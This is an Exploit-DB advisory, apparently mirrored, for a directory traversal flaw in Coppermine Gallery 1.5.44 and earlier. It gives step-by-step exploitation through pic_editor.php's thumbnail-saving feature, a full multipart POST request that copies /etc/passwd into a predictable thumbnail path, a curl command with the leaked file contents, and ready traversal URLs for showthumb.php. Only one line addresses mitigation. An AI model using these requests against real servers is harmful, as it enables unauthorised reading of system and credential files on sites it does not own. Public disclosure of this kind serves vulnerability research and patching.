Coppermine Gallery < 1.5.44 - Directory Traversal

• Exploit Database
• 18 阅读

• 作者： Hacker Fantastic
  日期： 2017-02-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41876/

• Coppermine Gallery <= 1.5.44 directory traversal vulnerability
  ==============================================================
  Coppermine is a multi-purpose fully-featured and integrated web
  picture gallery script written in PHP using GD or ImageMagick as
  image library with a MySQL backend. A directory travesal vuln
  exists within the "save_thumb" function of the "crop & rotate"
  image feature. This can be accessed from pic_editor.php. First
  upload a file, e.g. "hackerhouse.png" to an album. This will
  create a predictable file path location with your userid e.g:
  
  http://target/cpg15x/albums/userpics/10001/hackerhouse.png
  
  You will then send a POST request to pic_editor to manipulate
  this file but replace the "new_image" with the filepath you
  want to read such as "../../../../../etc/passwd". Your file
  will then by copied to a predictible path location as thumb.
  
  http://target/cpg15x/albums/userpics/10001/thumb_hackerhouse.png
  
  To exploit this vulnerability you will need to be able to
  register an account and upload files to a photo album. You
  do not need admin rights to exploit this flaw. All versions
  from cpg 1.4.14 to cpg 1.5.44 have been found vulnerable
  to this flaw. The coppermine configuration was tested with
  ImageMagick enabled, your mileage may vary with GD1.x/GD2.x.
  
  To protect against this exploit do not allow public registration
  requests and only allow trusted users to modify images.
  
  Example POST request
  ====================
  POST /cpg15x/pic_editor.php HTTP/1.1
  Host: target
  Content-Length: 802
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAE29AdEqShlpLpDF
  Accept: text/html,
  Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
  Cookie: <cookies>
  DNT: 1
  Connection: close
  
  ------WebKitFormBoundaryAE29AdEqShlpLpDF
  Content-Disposition: form-data; name="clipval"
  
  10
  ------WebKitFormBoundaryAE29AdEqShlpLpDF
  Content-Disposition: form-data; name="newimage"
  
  ../../../../../../../../../../../../../../etc/passwd
  ------WebKitFormBoundaryAE29AdEqShlpLpDF
  Content-Disposition: form-data; name="img_dir"
  
  albums/edit/
  ------WebKitFormBoundaryAE29AdEqShlpLpDF
  Content-Disposition: form-data; name="id"
  
  1
  ------WebKitFormBoundaryAE29AdEqShlpLpDF
  Content-Disposition: form-data; name="angle"
  
  45
  ------WebKitFormBoundaryAE29AdEqShlpLpDF
  100
  ------WebKitFormBoundaryAE29AdEqShlpLpDF
  Content-Disposition: form-data; name="save_thumb"
   
   Save as thumbnail 
  ------WebKitFormBoundaryAE29AdEqShlpLpDF-- 
  
  Example file download request
  =============================
  $ curl http://targetip/cpg15x/albums/userpics/10001/thumb_hackerhouse.png 
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  ... snip
  
  An additional directory traversal vulnerability is present
  in "showthumb.php" which can be used to stat() for the existence
  of files by reviewing the error returned. You must have 
  sufficient rights to use this feature however.
  
  /cpg15x/showthumb.php?picfile=../../../../../../etc/passwd
  /cpg15x/showthumb.php?picfile=../../../../../../etc/non-existantfile
  
  -- Hacker Fantastic
   (http://www.myhackerhouse.com)